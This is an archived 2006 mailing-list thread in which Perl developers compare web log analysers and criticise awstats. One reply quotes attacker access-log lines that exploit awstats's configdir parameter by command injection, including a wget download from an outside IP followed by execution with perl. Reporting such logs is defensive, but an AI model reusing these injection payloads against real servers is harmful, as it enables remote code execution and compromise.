List Info

Thread: awstats




awstats
user name
2006-03-08 08:45:26
A 10Kline CGI script, with most variables global and
including its own CGI 
parameter parsing. Is this really the best option, or can
anyone suggest an 
alternative which can parse Apache logfiles and successfully
separate out 
robots and spiders (about 80-90% of our hits) from real
users? (The 
department whose server this is rejected webalizer because
they didn't like 
the answers it gave).

Jonathan
awstats
user name
2006-03-08 08:51:24
We use analog here (http://www.analog.cx/),
seems to be up to the job. 
With something called report magic you can get some very
nice stats out 
of the box.

Personally I prefer something called webstats.pl but I
can't seem to 
find a link to it anymore.

awstats
user name
2006-03-08 09:03:52
On Wed, Mar 08, 2006 at 08:51:24AM +0000, Peter Hickman
wrote:
> We use analog here (http://www.analog.cx/),
seems to be up to the job. 
> With something called report magic you can get some
very nice stats out 
> of the box.

Isn't mint what all The Kewl Kids use these days?

http://www.haveamint.com/

I haven't, but then I amn't cool. awstats works for me,
has done for
years. I never liked analog.

m.
-- 
 _________________________________________ 
/ Sharon: I was like, totally shocked     \
| when I read swm's postings on the list. |
| I thought he was a quiet boy. Everyone  |
\ else: *racuous laughter*                /
 ----------------------------------------- 
  \
   \
       __     
      UooU\.'`.
      \__/()
           ()
           `YY~~~~YY'
            ||    ||
--
Gotta have a blog. It is the law.
http://www.stray
-toaster.co.uk/blog/
awstats
user name
2006-03-08 09:25:37
On 08/03/06, Jonathan McKeown <jonathanhst.org.za> wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI
> parameter parsing. Is this really the best option, or
can anyone suggest an
> alternative which can parse Apache logfiles and
successfully separate out
> robots and spiders (about 80-90% of our hits) from real
users? (The
> department whose server this is rejected webalizer
because they didn't like
> the answers it gave).

I run it as a cronjob generating a load of static html every
night..
works fine, and no dodgy CGI to worry about.

A.

awstats
user name
2006-03-08 09:27:10
On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI 
> parameter parsing. 

I'd say it has a widely known an exploitable flaw:

access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000]
"GET
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73c
ae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293
f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000]
"GET
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73c
ae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293
f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi-bin/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cgi/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000]
"GET //cp/awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000]
"GET //stat-cgi/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000]
"GET //awstats/awstats.pl?configdir=|%20id%20|
HTTP/1.1" 404 314

It's still going on.

/J\
-- 

This e-mail is sponsored by http://www.integrat
ion-house.com/

awstats
user name
2006-03-08 09:47:11
I knew I had seen that somewhere before, my snort logs!

There were only 20 incidents yesterday.

awstats
user name
2006-03-08 10:38:47
Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and
including its own CGI 
> parameter parsing. Is this really the best option, or
can anyone suggest an 
> alternative which can parse Apache logfiles and
successfully separate out 
> robots and spiders (about 80-90% of our hits) from real
users? (The 
> department whose server this is rejected webalizer
because they didn't like 
> the answers it gave).

I'm kinda fond of

http://www.hping.org/v
isitors/

which admittedly isn't quite as featureful as most, but is
simple, fast, and 
seems to generate all the stats clients really *need* - plus
a pretty 
route-through-site diagram that fulfils the shininess quota
nicely.

-- 
      Matt S Trout       Offering custom development,
consultancy and support
   Technical Director    contracts for Catalyst, DBIx::Class
and BAST. Contact
Shadowcat Systems Ltd.  mst (at) shadowcatsystems.co.uk for
more information

+ Help us build a better perl ORM: http://dbix
-class.shadowcatsystems.co.uk/ +
awstats
user name
2006-03-08 10:49:39
Jonathan McKeown writes:
> A 10Kline CGI script, with most variables global and
including its own
> CGI parameter parsing.

We looked at Awstats, to the extent of actually running it
for a while.
Then we stopped; we'd found plenty of reasons to avoid it:

  - The known vulnerabilities in its CGI mode may have been
fixed, but
    spaghetti code like that is just too hard and/or
unpleasant to
    audit.  I can't even say with confidence that letting
Awstats parse
    your log files off-line is definitely safe.

  - It can't actually parse Apache logs.  Since 1.3.25,
Apache has used
    a backslash escaping scheme for things like user-agents
and
    referrers, so that you can actually parse log lines
where the client
    sent a double-quote in one of those.  Awstats doesn't
care about
    that, so it misparses those lines.

  - You can't just point it at a batch of log files;
instead, you have
    to configure it to know where you store your log files,
and the
    pattern used for the filenames.  That means you can't
prime it with
    the last month's (or year's) worth of logs -- you just
have to run
    it for a month before it can give you any real history.

  - It really really wants each vhost analysed to have
exactly one log
    file.  In each time period, we have one log file per
public-facing
    server, each containing results for several vhosts.  It
wants us to
    split log files up by vhost, but then merge then by
public-facing
    server, before we even have it look at them.

  - It doesn't seem particularly fast. Admittedly, we
generate about 4
    GiB of uncompressed logs in a day, but our home-grown
stuff (which
    does actually parse, you know, Apache log files) seems
rather faster
    at the basic work of parsing logs, throwing away robotic
traffic,
    and aggregating data from the rest.

    It's possible it's not as bad for other people.  In
particular, to
    handle the vhost/server issue, we were effectively
making Awstats
    run through our logs once per vhost.  But I became
convinced that
    the time complexity of Awstats is supra-linear in the
number of
    requests anyway.  As it gathered more data over the
course of a
    month, it became apparent that it was soon going to need
more CPU
    time than we had available.  That's when we turned it
off.

In general, Awstats seems to be a tool that's intended for
relatively
small sites, hosted by low-end providers, with limited or no
shell
access, and exactly one log file per customer.  If you
don't fall into
that category, I don't think Awstats is going to be
particularly
convenient.

> Is this really the best option, or can anyone suggest
an alternative
> which can parse Apache logfiles and successfully
separate out robots
> and spiders (about 80-90% of our hits) from real users?

We wrote our own, sad to say.  We use the ABCE robot list;
I've looked
at CPANning our code, but most of it's the data file, and I
think ABCE
own the copyright on the list.

Note also that having home-grown log analysis stuff does
mean that we
can do things that a general-purpose tool couldn't.  For
example, our
software can examine popularity of site sections, rather
than just of
URLs.

-- 
Aaron Crane
awstats
user name
2006-03-08 11:57:37
On Wed, 8 Mar 2006, Aaron Crane wrote:

> We looked at Awstats, to the extent of actually running
it for a while.
> Then we stopped; we'd found plenty of reasons to avoid
it:
>
>   - The known vulnerabilities in its CGI mode may have
been fixed, but
>     spaghetti code like that is just too hard and/or
unpleasant to
>     audit.  I can't even say with confidence that
letting Awstats parse
>     your log files off-line is definitely safe.

Agreed. Every time I look at the code I want to scream.
It's just crying
out to be refactored into decent modules.

>   - It can't actually parse Apache logs.  Since
1.3.25, Apache has used
>     a backslash escaping scheme for things like
user-agents and
>     referrers, so that you can actually parse log lines
where the client
>     sent a double-quote in one of those.  Awstats
doesn't care about
>     that, so it misparses those lines.

I've not foud this to be a problem with 6.4 but perhaps
I'm not looking in
the right place. Which version did you try ?

>   - You can't just point it at a batch of log files;
instead, you have
>     to configure it to know where you store your log
files, and the
>     pattern used for the filenames.  That means you
can't prime it with
>     the last month's (or year's) worth of logs -- you
just have to run
>     it for a month before it can give you any real
history.

A simple shell script allows you iterate over as many logs
as you want. We
rotate logs weekly and have had to rerun a whole year's
worth before now.
Wildcards would be nice though.

>   - It really really wants each vhost analysed to have
exactly one log
>     file.  In each time period, we have one log file
per public-facing
>     server, each containing results for several vhosts.
 It wants us to
>     split log files up by vhost, but then merge then by
public-facing
>     server, before we even have it look at them.

Kinda. You do need to merge the logs into timestamp order
but you can lok
for specific vhosts with the %v modifier in the log format.

>   - It doesn't seem particularly fast. Admittedly, we
generate about 4
>     GiB of uncompressed logs in a day, but our
home-grown stuff (which
>     does actually parse, you know, Apache log files)
seems rather faster
>     at the basic work of parsing logs, throwing away
robotic traffic,
>     and aggregating data from the rest.

It's not very fast and admits as much but it's fast enough
on our logs
that are about 450Mb/week.

>     It's possible it's not as bad for other people. 
In particular, to
>     handle the vhost/server issue, we were effectively
making Awstats
>     run through our logs once per vhost.  But I became
convinced that
>     the time complexity of Awstats is supra-linear in
the number of
>     requests anyway.  As it gathered more data over the
course of a
>     month, it became apparent that it was soon going to
need more CPU
>     time than we had available.  That's when we turned
it off.
>
> In general, Awstats seems to be a tool that's intended
for relatively
> small sites, hosted by low-end providers, with limited
or no shell
> access, and exactly one log file per customer.  If you
don't fall into
> that category, I don't think Awstats is going to be
particularly
> convenient.

I would agree with that. It's definitely not up to the job
of managing
large sites.

> > Is this really the best option, or can anyone
suggest an alternative
> > which can parse Apache logfiles and successfully
separate out robots
> > and spiders (about 80-90% of our hits) from real
users?
>
> We wrote our own, sad to say.  We use the ABCE robot
list; I've looked
> at CPANning our code, but most of it's the data file,
and I think ABCE
> own the copyright on the list.

We're tending towards doing this too. I just looked at
webtrends and it's
almost $10,000 for the licence we need.

> Note also that having home-grown log analysis stuff
does mean that we
> can do things that a general-purpose tool couldn't. 
For example, our
> software can examine popularity of site sections,
rather than just of
> URLs.

This is the problem we're now experiencing with awstats. We
need
granularity that awstats doesn't have.

Simon.

-- 
"You've really gotta know where your towel is."

awstats
user name
2006-03-08 14:36:57
Matt S Trout wrote:
> Jonathan McKeown wrote:
>> A 10Kline CGI script, with most variables global
and including its own 
>> CGI parameter parsing. Is this really the best
option, or can anyone 
>> suggest an alternative which can parse Apache
logfiles and 
>> successfully separate out robots and spiders (about
80-90% of our 
>> hits) from real users? (The department whose server
this is rejected 
>> webalizer because they didn't like the answers it
gave).
> 
> I'm kinda fond of
> 
> http://www.hping.org/v
isitors/
> 
> which admittedly isn't quite as featureful as most,
but is simple, fast, 
> and seems to generate all the stats clients really
*need* - plus a 
> pretty route-through-site diagram that fulfils the
shininess quota nicely.

mmm.... smooth.

Thanks for that. I now have a reason to ditch webalizer.

David
-- 
"It's overkill of course, but you can never have too
much overkill."

[1-10] [11-12]

about | contact  Other archives ( Real Estate discussion Medical topics )